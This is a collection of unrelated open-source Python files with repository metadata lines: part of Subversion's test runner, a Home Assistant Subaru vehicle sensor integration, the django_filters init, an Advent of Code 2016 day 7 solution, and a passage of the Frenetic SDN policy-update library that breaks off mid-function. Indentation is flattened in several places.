svnauthz_binary = os.path.join(options.tools_bin, 'svnauthz' + _exe)
svnauthz_validate_binary = os.path.join(options.tools_bin,
'svnauthz-validate' + _exe)
######################################################################
# Cleanup: if a previous run crashed or interrupted the python
# interpreter, then `temp_dir' was never removed. This can cause wonkiness.
if not options.is_child_process:
safe_rmtree(temp_dir, 1)
if not testnums:
# If no test numbers were listed explicitly, include all of them:
testnums = list(range(1, len(test_list)))
if options.list_tests:
# If we want to list the target milestones, then get all the issues
# associated with all the individual tests.
milestones_dict = None
if options.milestone_filter:
issues_dict = {}
for testnum in testnums:
issues = TestRunner(test_list[testnum], testnum).get_issues()
test_mode = TestRunner(test_list[testnum], testnum).get_mode().upper()
if issues:
for issue in issues:
if (options.mode_filter.upper() == 'ALL' or
options.mode_filter.upper() == test_mode or
(options.mode_filter.upper() == 'PASS' and test_mode == '')):
issues_dict[issue]=issue
milestones_dict = get_issue_details(issues_dict.keys())
header = "Test # Mode Test Description\n"
if options.milestone_filter:
header += " Issue#(Target Mileston/Assigned To)\n"
header += "------ ----- ----------------"
printed_header = False
for testnum in testnums:
test_mode = TestRunner(test_list[testnum], testnum).get_mode().upper()
if options.mode_filter.upper() == 'ALL' \
or options.mode_filter.upper() == test_mode \
or (options.mode_filter.upper() == 'PASS' and test_mode == ''):
if not printed_header:
          print(header)
printed_header = True
TestRunner(test_list[testnum], testnum).list(milestones_dict)
# We are simply listing the tests so always exit with success.
return 0
# don't run tests in parallel when the tests don't support it or there
# are only a few tests to run.
if serial_only or len(testnums) < 2:
options.parallel = 0
if not options.is_child_process:
# Build out the default configuration directory
create_config_dir(default_config_dir,
ssl_cert=options.ssl_cert,
ssl_url=options.test_area_url,
http_proxy=options.http_proxy)
# Setup the pristine repository
svntest.actions.setup_pristine_greek_repository()
# Run the tests.
exit_code = _internal_run_tests(test_list, testnums, options.parallel,
options.srcdir, progress_func)
# Remove all scratchwork: the 'pristine' repository, greek tree, etc.
# This ensures that an 'import' will happen the next time we run.
if not options.is_child_process and not options.keep_local_tmp:
safe_rmtree(temp_dir, 1)
# Cleanup after ourselves.
svntest.sandbox.cleanup_deferred_test_paths()
# Return the appropriate exit code from the tests.
return exit_code
| centic9/subversion-ppa | subversion/tests/cmdline/svntest/main.py | Python | apache-2.0 | 78,919 | 0.01219 |
"""Support for Subaru sensors."""
import subarulink.const as sc
from homeassistant.components.sensor import DEVICE_CLASSES
from homeassistant.const import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_VOLTAGE,
LENGTH_KILOMETERS,
LENGTH_MILES,
PERCENTAGE,
PRESSURE_HPA,
TEMP_CELSIUS,
TIME_MINUTES,
VOLT,
VOLUME_GALLONS,
VOLUME_LITERS,
)
from homeassistant.util.distance import convert as dist_convert
from homeassistant.util.unit_system import (
IMPERIAL_SYSTEM,
LENGTH_UNITS,
PRESSURE_UNITS,
TEMPERATURE_UNITS,
)
from homeassistant.util.volume import convert as vol_convert
from .const import (
API_GEN_2,
DOMAIN,
ENTRY_COORDINATOR,
ENTRY_VEHICLES,
VEHICLE_API_GEN,
VEHICLE_HAS_EV,
VEHICLE_HAS_SAFETY_SERVICE,
VEHICLE_STATUS,
)
from .entity import SubaruEntity
L_PER_GAL = vol_convert(1, VOLUME_GALLONS, VOLUME_LITERS)
KM_PER_MI = dist_convert(1, LENGTH_MILES, LENGTH_KILOMETERS)
# Fuel Economy Constants
FUEL_CONSUMPTION_L_PER_100KM = "L/100km"
FUEL_CONSUMPTION_MPG = "mi/gal"
FUEL_CONSUMPTION_UNITS = [FUEL_CONSUMPTION_L_PER_100KM, FUEL_CONSUMPTION_MPG]
SENSOR_TYPE = "type"
SENSOR_CLASS = "class"
SENSOR_FIELD = "field"
SENSOR_UNITS = "units"
# Sensor data available to "Subaru Safety Plus" subscribers with Gen1 or Gen2 vehicles
SAFETY_SENSORS = [
{
SENSOR_TYPE: "Odometer",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.ODOMETER,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with Gen2 vehicles
API_GEN_2_SENSORS = [
{
SENSOR_TYPE: "Avg Fuel Consumption",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.AVG_FUEL_CONSUMPTION,
SENSOR_UNITS: FUEL_CONSUMPTION_L_PER_100KM,
},
{
SENSOR_TYPE: "Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.DIST_TO_EMPTY,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
{
SENSOR_TYPE: "Tire Pressure FL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure FR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "External Temp",
SENSOR_CLASS: DEVICE_CLASS_TEMPERATURE,
SENSOR_FIELD: sc.EXTERNAL_TEMP,
SENSOR_UNITS: TEMP_CELSIUS,
},
{
SENSOR_TYPE: "12V Battery Voltage",
SENSOR_CLASS: DEVICE_CLASS_VOLTAGE,
SENSOR_FIELD: sc.BATTERY_VOLTAGE,
SENSOR_UNITS: VOLT,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with PHEV vehicles
EV_SENSORS = [
{
SENSOR_TYPE: "EV Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_DISTANCE_TO_EMPTY,
SENSOR_UNITS: LENGTH_MILES,
},
{
SENSOR_TYPE: "EV Battery Level",
SENSOR_CLASS: DEVICE_CLASS_BATTERY,
SENSOR_FIELD: sc.EV_STATE_OF_CHARGE_PERCENT,
SENSOR_UNITS: PERCENTAGE,
},
{
SENSOR_TYPE: "EV Time to Full Charge",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_TIME_TO_FULLY_CHARGED,
SENSOR_UNITS: TIME_MINUTES,
},
]
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Subaru sensors by config_entry."""
coordinator = hass.data[DOMAIN][config_entry.entry_id][ENTRY_COORDINATOR]
vehicle_info = hass.data[DOMAIN][config_entry.entry_id][ENTRY_VEHICLES]
entities = []
for vin in vehicle_info.keys():
entities.extend(create_vehicle_sensors(vehicle_info[vin], coordinator))
async_add_entities(entities, True)
def create_vehicle_sensors(vehicle_info, coordinator):
"""Instantiate all available sensors for the vehicle."""
sensors_to_add = []
if vehicle_info[VEHICLE_HAS_SAFETY_SERVICE]:
sensors_to_add.extend(SAFETY_SENSORS)
if vehicle_info[VEHICLE_API_GEN] == API_GEN_2:
sensors_to_add.extend(API_GEN_2_SENSORS)
if vehicle_info[VEHICLE_HAS_EV]:
sensors_to_add.extend(EV_SENSORS)
return [
SubaruSensor(
vehicle_info,
coordinator,
s[SENSOR_TYPE],
s[SENSOR_CLASS],
s[SENSOR_FIELD],
s[SENSOR_UNITS],
)
for s in sensors_to_add
]
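# For example (counting the lists above), a Gen2 PHEV with an active
# safety subscription gets SAFETY_SENSORS + API_GEN_2_SENSORS + EV_SENSORS
# (12 entities total), while a Gen1 vehicle gets only the odometer.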
class SubaruSensor(SubaruEntity):
"""Class for Subaru sensors."""
def __init__(
self, vehicle_info, coordinator, entity_type, sensor_class, data_field, api_unit
):
"""Initialize the sensor."""
super().__init__(vehicle_info, coordinator)
self.hass_type = "sensor"
self.current_value = None
self.entity_type = entity_type
self.sensor_class = sensor_class
self.data_field = data_field
self.api_unit = api_unit
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
if self.sensor_class in DEVICE_CLASSES:
return self.sensor_class
return super().device_class
@property
def state(self):
"""Return the state of the sensor."""
self.current_value = self.get_current_value()
if self.current_value is None:
return None
if self.api_unit in TEMPERATURE_UNITS:
return round(
self.hass.config.units.temperature(self.current_value, self.api_unit), 1
)
if self.api_unit in LENGTH_UNITS:
return round(
self.hass.config.units.length(self.current_value, self.api_unit), 1
)
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return round(
self.hass.config.units.pressure(self.current_value, self.api_unit),
1,
)
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
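                # Unit algebra (sketch): mpg = (100 * L_PER_GAL) / (KM_PER_MI * l_per_100km),
                # e.g. 9.4 L/100km -> (100 * 3.785) / (1.609 * 9.4) ~= 25 mpg.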
return round((100.0 * L_PER_GAL) / (KM_PER_MI * self.current_value), 1)
return self.current_value
@property
def unit_of_measurement(self):
"""Return the unit_of_measurement of the device."""
if self.api_unit in TEMPERATURE_UNITS:
return self.hass.config.units.temperature_unit
if self.api_unit in LENGTH_UNITS:
return self.hass.config.units.length_unit
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return self.hass.config.units.pressure_unit
return PRESSURE_HPA
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return FUEL_CONSUMPTION_MPG
return FUEL_CONSUMPTION_L_PER_100KM
return self.api_unit
@property
def available(self):
"""Return if entity is available."""
last_update_success = super().available
if last_update_success and self.vin not in self.coordinator.data:
return False
return last_update_success
def get_current_value(self):
"""Get raw value from the coordinator."""
value = self.coordinator.data[self.vin][VEHICLE_STATUS].get(self.data_field)
if value in sc.BAD_SENSOR_VALUES:
value = None
if isinstance(value, str):
if "." in value:
value = float(value)
else:
value = int(value)
return value
| partofthething/home-assistant | homeassistant/components/subaru/sensor.py | Python | apache-2.0 | 7,898 | 0.000886 |
# flake8: noqa
from __future__ import absolute_import
from .filterset import FilterSet
from .filters import *
__version__ = '0.9.2'
def parse_version(version):
'''
'0.1.2-dev' -> (0, 1, 2, 'dev')
'0.1.2' -> (0, 1, 2)
'''
v = version.split('.')
v = v[:-1] + v[-1].split('-')
ret = []
for p in v:
if p.isdigit():
ret.append(int(p))
else:
ret.append(p)
return tuple(ret)
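# For this release, VERSION == parse_version('0.9.2') == (0, 9, 2); a
# suffixed version such as '1.0a1-dev' would yield (1, '0a1', 'dev').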
VERSION = parse_version(__version__)
| andela-bojengwa/talk | venv/lib/python2.7/site-packages/django_filters/__init__.py | Python | mit | 485 | 0.002062 |
import re
with open('d07.txt') as f:
raw_input = f.readlines()
test_input = """abba[mnop]qrst
abcd[bddb]xyyx
aaaa[qwer]tyui
ioxxoj[asdfgh]zxcvbn
asdfasdf[qwerqwer]asdffdsa[12341234]zcxvzcv""".splitlines()
def group_finder(s):
head, _, tail = s.partition('[')
yield head
if tail:
yield from group_finder(tail)
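# group_finder alternates supernet/hypernet pieces once ']' is rewritten to
# '[': e.g. 'abba[mnop]qrst' yields 'abba', 'mnop', 'qrst', so even indices
# are supernet sequences and odd indices are hypernet sequences.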
re_abba = re.compile(r'.*([a-z])(?!\1)([a-z])\2\1')
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
if any(re_abba.match(ip) for ip in ips) and not any(re_abba.match(hn) for hn in hns):
total += 1
print(total)
# part 2!
test_input = """aba[bab]xyz
xyx[xyx]xyx
aaa[kek]eke
zazbz[bzb]cdb""".splitlines()
import regex
re_aba = regex.compile(r'([a-z])(?!\1)([a-z])\1')
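# An ABA like 'zaz' outside brackets needs the matching BAB 'aza' inside
# brackets; overlapped=True also catches overlapping candidates, e.g.
# 'zazbz' yields both ('z', 'a') and ('z', 'b').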
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
match = False
for ip in ips:
for a, b in re_aba.findall(ip, overlapped=True):
if any(b + a + b in hn for hn in hns):
match = True
if match:
total += 1
print(total)
| sclarke/adventofcode2016 | d07.py | Python | bsd-3-clause | 1,196 | 0.001672 |
################################################################################
# The Frenetic Project #
# frenetic@frenetic-lang.org #
################################################################################
# Licensed to the Frenetic Project by one or more contributors. See the #
# NOTICE file distributed with this work for additional information #
# regarding copyright and ownership. The Frenetic Project licenses this #
# file to you under the following license. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided the following conditions are met: #
# - Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation or other materials provided with the distribution. #
# - The names of the copyright holds and contributors may not be used to #
# endorse or promote products derived from this work without specific #
# prior written permission. #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# LICENSE file distributed with this work for specific language governing #
# permissions and limitations under the License. #
################################################################################
# /updates/update_lib.py #
# Update Library Functions #
################################################################################
from collections import defaultdict
import sys, os
from time import time
sys.path.append(os.environ['NOX_CORE_DIR'])
from nox.lib.core import UINT32_MAX, openflow
from policy import *
import logging
from decimal import Decimal
import networkx as nx
from update import UpdateObject
log = logging.getLogger("frenetic.update.update_lib")
#############
# CONSTANTS #
#############
# maximum priority of OpenFlow rules
MAX_PRIORITY = 0xffff
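# Each update is installed at a strictly lower priority than the previous
# one; when the counter reaches 0, priority_garbage_collect() below
# re-bases the installed rules at MAX_PRIORITY again.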
####################
# GLOBAL VARIABLES #
####################
# inst
# * reference to currently running NOX component
# * also stores run-time structures used during updates
# - current_version: policy version
# - current_priority: OpenFlow priority level
# - current_internal_policy: policy for versioned traffic
# - current_edge_policy: policy for unversioned traffic
# - active_flows: dictionary of active flows, used for per-flow updates
# - current_abstract_policy: unversioned policy equivalent to current
# - future_abstract_policy: unversioned policy we're updating to
# - concrete_policy: maps abstract rules to installed versioned rules
# - installed_priority: FIXME
# - stats: statistics
inst = None
experiment = False
DEBUG = True
def setup(_inst, _experiment):
"""
_inst: reference to current NOX component
sets inst to _inst and initializes run-time structures
"""
global inst
global experiment
inst = _inst
experiment = _experiment
inst.current_version = 0
inst.current_priority = MAX_PRIORITY
inst.current_internal_policy = NetworkPolicy()
inst.current_edge_policy = NetworkPolicy()
inst.active_flows = {}
inst.current_abstract_policy = NetworkPolicy()
inst.future_abstract_policy = NetworkPolicy()
inst.stats = UpdateStats()
inst.concrete_policy = defaultdict(lambda:defaultdict(lambda:[]))
inst.installed_priority = \
defaultdict(lambda:defaultdict(lambda:MAX_PRIORITY))
return
##############
# STATISTICS #
##############
# UpdateStats
class UpdateStats:
"""
Class whose objects represent statistics about the number of
policy updates, rule adds, and rule deletes.
"""
def __init__(self):
self.updates = 0
self.start_time = time()
self.installs = defaultdict(lambda:0)
self.modifies = defaultdict(lambda:0)
self.deletes = defaultdict(lambda:0)
self.current_rules = defaultdict(lambda:0)
self.current_abstract_rules = defaultdict(lambda:0)
self.future_abstract_rules = defaultdict(lambda:0)
self.max_overhead = defaultdict(lambda:0)
def tally_update(self, policy):
self.updates += 1
self.current_abstract_rules = self.future_abstract_rules
self.future_abstract_rules = {}
for switch, config in policy:
self.future_abstract_rules[switch] = Decimal(len(config))
def tally_install(self, switch):
self.installs[switch] += 1
self.current_rules[switch] += 1
def tally_overhead(self, switch, config):
"""
Calculates rule overhead, i.e. the maximum number of rules
actually installed at a time versus the minimal rules
required. So, if we had 2*N rules installed while
transitioning between configs of size N, the overhead would be
100%
"""
if switch in self.current_abstract_rules:
old_size = self.current_abstract_rules[switch]
else:
old_size = 0
if switch in self.future_abstract_rules:
new_size = self.future_abstract_rules[switch]
else:
new_size = 0
base_size = max(old_size, new_size)
extra_size = \
Decimal(self.current_rules[switch] - base_size + len(config))
overhead = extra_size/max(base_size, 1)
self.max_overhead[switch] = max(self.max_overhead[switch], overhead)
def tally_modify(self, switch):
self.modifies[switch] += 1
def tally_delete(self, switch):
self.deletes[switch] += 1
self.current_rules[switch] -= 1
def all_installs(self):
return sum(self.installs.values())
def all_modifies(self):
return sum(self.modifies.values())
def all_deletes(self):
return sum(self.deletes.values())
def all_operations(self):
return self.all_installs() + self.all_modifies()
def all_overheads(self):
return max(self.max_overhead.values())
def __str__(self):
s = " Update Statistics\n"
s += "--------------------------------------------\n"
s += "Switch\t(+)\t(-)\t(~)\tTotal\tOverhead\n"
s += "--------------------------------------------\n"
for switch in set(self.installs.keys()
+ self.deletes.keys()
+ self.modifies.keys()):
i = self.installs[switch]
d = self.deletes[switch]
m = self.modifies[switch]
o = self.max_overhead[switch]
s += "s%d\t%d\t%d\t%d\t%d\t%d%%\n" % (switch, i, d, m, i+d+m, 100*o)
s += "--------------------------------------------\n"
s += "total\t%d\t%d\t%d\t%d\t%d%%\t%.4f\n" % \
(self.all_installs(),
self.all_deletes(),
self.all_modifies(),
self.all_operations(),
100*self.all_overheads(),
time() - self.start_time)
return s
##########################################
# OPENFLOW-LEVEL INSTALL/DELETE COMMANDS #
##########################################
def install_rule(switch, pattern, actions, priority, idle_timeout):
""" Wrapper for OpenFlow add request """
inst.stats.tally_install(switch)
if not experiment:
inst.send_flow_command(switch,
openflow.OFPFC_ADD,
pattern,
priority,
(idle_timeout, actions, UINT32_MAX),
openflow.OFP_FLOW_PERMANENT)
return
def modify_rule(switch, pattern, actions, priority,
idle_timeout=openflow.OFP_FLOW_PERMANENT):
"""
Wrapper for OpenFlow modify request
counters and timeouts are copied from current rule if they exist
"""
inst.stats.tally_modify(switch)
if not experiment:
inst.send_flow_command(switch,
openflow.OFPFC_MODIFY,
pattern,
priority,
(idle_timeout, actions, UINT32_MAX),
openflow.OFP_FLOW_PERMANENT)
return
def delete_rules(switch, pattern, priority):
""" Wrapper for OpenFlow delete request """
inst.stats.tally_delete(switch)
if not experiment:
inst.send_flow_command(switch, openflow.OFPFC_DELETE_STRICT, pattern,
priority)
return
########################################
# POLICY-LEVEL INSTALL/DELETE COMMANDS #
########################################
def install(policy, idle_timeout=openflow.OFP_FLOW_PERMANENT):
""" Propagates a policy into the network """
for switch, config in policy:
if not switch in inst.concrete_policy:
inst.concrete_policy[switch] = defaultdict(lambda:[])
inst.stats.tally_overhead(switch, config)
if DEBUG:
log.debug("Installing " + str(len(config)) + " rules on "
+ str(switch))
# log.debug("Installing: " + str(config))
for rule in config:
nox_pattern, nox_actions = rule.convert_to_nox_rule()
install_rule(switch, nox_pattern, nox_actions, rule.priority,
idle_timeout)
inst.installed_priority[switch][rule.pattern] = rule.priority
inst.concrete_policy[switch][rule.parent].append(rule)
return
def uninstall(policy):
""" Removes a policy from the network """
for switch, config in policy:
if not switch in inst.concrete_policy:
inst.concrete_policy[switch] = defaultdict(lambda:[])
if DEBUG:
log.debug("Uninstalling " + str(len(config)) + " rules on "
+ str(switch))
# log.debug("Uninstalling: " + str(config))
for rule in config:
priority = inst.installed_priority[switch][rule.pattern]
delete_rules(switch, rule.pattern.to_dict(), priority)
inst.concrete_policy[switch][rule.parent].remove(rule)
return
def modify_policy(policy, idle_timeout=openflow.OFP_FLOW_PERMANENT):
""" Propagates a policy into the network """
for switch, config in policy:
if not switch in inst.concrete_policy:
inst.concrete_policy[switch] = defaultdict(lambda:[])
if DEBUG:
log.debug("Modifying " + str(len(config)) + " rules on "
+ str(switch))
for rule in config:
nox_pattern, nox_actions = rule.convert_to_nox_rule()
old_priority = inst.installed_priority[switch][rule.pattern]
# modify_rule(switch, nox_pattern, nox_actions, rule.priority,
# idle_timeout)
if old_priority != rule.priority:
install_rule(switch, nox_pattern, nox_actions, rule.priority,
idle_timeout)
delete_rules(switch, nox_pattern, old_priority)
if rule in inst.concrete_policy[switch][rule.parent]:
inst.concrete_policy[switch][rule.parent].remove(rule)
inst.concrete_policy[switch][rule.parent].append(rule)
inst.installed_priority[switch][rule.pattern] = rule.priority
return
##########################
# POLICY INSTRUMENTATION #
##########################
# JNF TODO: implement IN_PORT and FLOOD actions
def mk_versioned_actions(actions, version, tagged, edge_ports, old_version,
fake_edge_ports):
"""
Instruments a list of actions, modifying the vlan tag as needed
for a versioned policy
actions: list of actions to instrument
version: policy version number
tagged: if the traffic is already versioned or not
edge_ports: set of outward-facing ports according to the topology
"""
new_actions = []
for action in actions:
if action.tag == "forward":
[port] = action.subexprs
if port in edge_ports:
if tagged:
if old_version is None:
new_actions.append(strip("vlan"))
elif port in fake_edge_ports:
new_actions.append(modify(("vlan", old_version)))
tagged = "external"
else:
if tagged == "external":
new_actions.append(modify(("vlan", version)))
tagged = "internal"
elif not tagged:
new_actions.append(modify(("vlan", version)))
tagged = "internal"
new_actions.append(action)
else:
new_actions.append(action)
return new_actions
def mk_internal_rule(rule, version, priority, edge_ports,
old_version, fake_edge_ports):
internal_pattern = Pattern(rule.pattern, DL_VLAN=version)
# internal_pattern.DL_VLAN = version
internal_actions = mk_versioned_actions(rule.actions, version,
tagged="internal",
edge_ports=edge_ports,
old_version=old_version,
fake_edge_ports=fake_edge_ports)
return Rule(internal_pattern, internal_actions, priority=priority,
parent=rule, edge=False)
def mk_edge_rule(rule, version, priority, edge_ports, old_version,
fake_edge_ports):
edge_pattern = Pattern(rule.pattern, DL_VLAN=openflow.OFP_VLAN_NONE)
edge_actions = mk_versioned_actions(rule.actions, version, False,
edge_ports, old_version,
fake_edge_ports)
return Rule(edge_pattern, edge_actions, priority=priority, parent=rule,
edge=True)
def mk_fake_edge_rule(rule, version, priority, edge_ports, old_version,
fake_edge_ports):
edge_pattern = Pattern(rule.pattern, DL_VLAN=old_version)
edge_actions = mk_versioned_actions(rule.actions, version, False,
edge_ports, old_version,
fake_edge_ports)
return Rule(edge_pattern, edge_actions, priority=priority,
parent=rule, edge=True)
def mk_versioned_configs(switch, config, version, priority,
topology, old_version=None,
fake_edge_ports=None, fake_edge_switches=None):
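    """Split CONFIG for SWITCH into (internal_config, edge_config).
    Internal rules match traffic already tagged with VERSION; edge rules
    match untagged traffic (or traffic still tagged with OLD_VERSION and
    arriving on FAKE_EDGE_PORTS) and stamp it with VERSION."""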
internal_config = SwitchConfiguration()
edge_config = SwitchConfiguration()
if not fake_edge_switches:
fake_edge_switches = []
edge_switches = topology.edge_switches() + list(fake_edge_switches)
edge_ports = topology.edge_ports(switch)
if not fake_edge_ports:
fake_edge_ports = []
for rule in config:
# if rule only applies to internal traffic
if (switch not in edge_switches
or (rule.pattern.IN_PORT != Pattern.WILD
and rule.pattern.IN_PORT not in edge_ports
and rule.pattern.IN_PORT not in fake_edge_ports)):
internal_rule = mk_internal_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
internal_config.add_rule(internal_rule)
# otherwise, if rule may apply to both internal and edge traffic
else:
# if rule only applies to edge traffic
if rule.pattern.IN_PORT in edge_ports:
edge_rule = mk_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
edge_config.add_rule(edge_rule)
elif rule.pattern.IN_PORT in fake_edge_ports:
edge_rule = mk_fake_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
edge_config.add_rule(edge_rule)
else:
edge_rule = mk_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
fake_edge_rule = mk_fake_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
# add both internal and edge rules to respective configs
internal_rule = mk_internal_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
internal_config.add_rule(internal_rule)
edge_config.add_rule(edge_rule)
edge_config.add_rule(fake_edge_rule)
return (internal_config, edge_config)
def mk_versioned_policies(policy, version, priority, topology,
old_version=None,
fake_edge_ports=None):
""" Constructs internal and edge policies from policy and version """
# initialize fresh policy objects
internal_policy = NetworkPolicy()
edge_policy = NetworkPolicy()
# for each switch mentioned in the policy
for switch, config in policy:
# FIXME: Am I supposed to pass through the fake_edge_ports
# arg? How does this work again?
internal_config, edge_config = \
mk_versioned_configs(switch, config, version, priority, topology,
old_version=old_version, fake_edge_ports=None)
internal_policy[switch] = internal_config
edge_policy[switch] = edge_config
return (internal_policy, edge_policy)
#####################
# UPDATE INTERFACES #
#####################
def per_packet_update(topology, new_policy, use_extension=True,
use_subspace=True, use_island=False):
"""
    Updates to the new policy using versioning + two-phase commit, applying
    optimizations when they are safe.
    topology: nxtopo.NXTopo object representing the topology
    new_policy: policy.NetworkPolicy object
    use_extension: boolean enabling the extension/retraction optimization
    use_subspace: boolean enabling the subspace update optimization
    use_island: boolean enabling the island update optimization
"""
# if current policy empty
if (inst.current_internal_policy.is_empty()
        and inst.current_edge_policy.is_empty()
and inst.current_abstract_policy.is_empty()):
# use empty_update
update = empty_update(topology, new_policy)
else:
minus_delta = inst.current_abstract_policy - new_policy
plus_delta = new_policy - inst.current_abstract_policy
# If retraction
if use_extension and new_policy <= inst.current_abstract_policy and \
is_not_reachable(minus_delta, inst.current_abstract_policy - minus_delta,
topology):
update = retraction_update(topology, new_policy, minus_delta)
# else if extension
elif use_extension and inst.current_abstract_policy <= new_policy and \
is_not_reachable(plus_delta, inst.current_abstract_policy, topology):
update = extension_update(topology, new_policy, plus_delta)
# otherwise
elif use_subspace:
update = subspace_update(topology, new_policy)
# partial_per_packet_update(topology, new_policy,
# inst.current_abstract_policy)
elif use_island:
update = island_update(topology, new_policy)
else:
update = full_per_packet_update(topology, new_policy)
two_phase_update(topology, update)
inst.current_abstract_policy = new_policy
return
def per_flow_update(topology, new_policy, flow_window, refine, refine_window,
use_extension=True, use_subspace=True, use_island=False):
"""
Updates to new policy using versioning + two-phase commit
topology: nxtopo.NXTopo object representing topology
new_policy: policy.NetworkPolicy object
flow_window: time window between flows
refine: function from a pattern to a list of patterns
- must denotes the same fragment of flowspace!
refine_window: timer for invoking refine_flows
"""
# if current policy empty
if (inst.current_internal_policy.is_empty()
and inst.current_edge_policy.is_empty()):
# use empty_update
update = empty_update(topology, new_policy)
# otherwise
else:
return
def two_phase_update_flows(topology, update):
# if necessary, garbage collect priorities
if inst.current_priority == 0:
priority_garbage_collect()
# retrieve current data from stats
current_internal_policy = inst.current_internal_policy
current_edge_policy = inst.current_edge_policy
current_version = inst.current_version
current_priority = inst.current_priority
# calculate new versions
new_version = current_version + 1
# calculate new priorities:
# - flow_priority for active flows from old policy
# - new priority (lower) for new policy
flow_priority = current_priority - 1
new_priority = current_priority - 2
# create versioned policies for internal and edge traffic
internal_policy, edge_policy = \
mk_versioned_policies(new_policy, new_version, new_priority,
topology)
# calculate flows for current edge policy
active_flows = current_edge_policy.flows()
# (1) install internal policy
install(internal_policy)
# (2) reinstall current policy at flow_priority, using
# flow_window as idle_timeout
# TODO: Now that we use rule priorities, make sure each rule
# is at flow_priority
install(current_internal_policy, idle_timeout=flow_window)
install(current_edge_policy, idle_timeout=flow_window)
# (3) install edge policy
install(edge_policy)
# (4) remove old edge policy
# TODO: Removed old priority argument (=
# current_priority). Verify this is not needed
uninstall(current_edge_policy)
# (5) remove old internal policy
uninstall(current_internal_policy)
# update inst with old data
inst.active_flows = active_flows
inst.current_internal_policy = internal_policy
inst.current_edge_policy = edge_policy
inst.current_version = new_version
inst.current_priority = new_priority
inst.post_callback(refine_window,
lambda:refine_flows(flow_window, refine,
refine_window, flow_priority))
def priority_garbage_collect():
""" Resets priority to maximum value """
# retrieve current data from inst
current_internal_policy = inst.current_internal_policy
current_edge_policy = inst.current_edge_policy
active_flows = inst.active_flows
# reset priority
new_priority = MAX_PRIORITY
# if active_flows exist
if active_flows:
flow_priority = MAX_PRIORITY
new_priority = flow_priority - 1
# modify them to be at flow priority
for switch, flows in active_flows:
for (pattern, actions) in flows:
modify_rule(switch, pattern, actions, flow_priority)
# reinstall current policy at new priority
modify_policy(current_internal_policy, new_priority)
modify_policy(current_edge_policy, new_priority)
# # uninstall old policies
# uninstall(current_internal_policy)
# uninstall(current_edge_policy)
# update inst with new data
inst.current_internal_policy.set_priority(new_priority)
inst.current_edge_policy.set_priority(new_priority)
inst.current_priority = new_priority
return
########################
# UPDATE OPTIMIZATIONS #
########################
# TODO: Restore 'count' argument? Still needed?
def empty_update(topology, new_policy):
"""
precondition: current policy has no rules
provides per-packet and per-flow (vacuously)
"""
assert not (inst.current_internal_policy or
inst.current_edge_policy or
inst.current_abstract_policy)
log.debug("Empty update")
# update stats
inst.stats.tally_update(new_policy)
if DEBUG:
log.debug("New policy: \n" + str(new_policy))
# retrieve current version from inst
current_version = inst.current_version
# reset priority to maximum value and bump version number
new_priority = MAX_PRIORITY
new_version = current_version + 1
# create versioned policies for internal and edge traffic
internal_policy, edge_policy = \
mk_versioned_policies(new_policy, new_version, new_priority, topology)
return UpdateObject(internal_policy, edge_policy, None, None,
new_priority, new_version)
def extension_update(topology, new_policy, plus_delta):
"""
precondition: plus_delta is unreachable from current policy
provides per-packet
"""
plus_internal_delta, plus_edge_delta = \
mk_versioned_policies(plus_delta, inst.current_version,
inst.current_priority, topology)
# update stats
inst.stats.tally_update(new_policy)
log.debug("Extension update!")
current_version = inst.current_version
current_priority = inst.current_priority
return UpdateObject(plus_internal_delta, plus_edge_delta,
NetworkPolicy(), NetworkPolicy(),
current_priority, current_version)
def retraction_update(topology, new_policy, minus_delta):
"""
precondition: minus_delta is unreachable from current policy - minus_delta
provides per-packet
"""
minus_internal_delta, minus_edge_delta = concrete_rules(minus_delta)
# update stats
inst.stats.tally_update(new_policy)
log.debug("Retraction update!")
current_version = inst.current_version
current_priority = inst.current_priority
return UpdateObject(NetworkPolicy(), NetworkPolicy(),
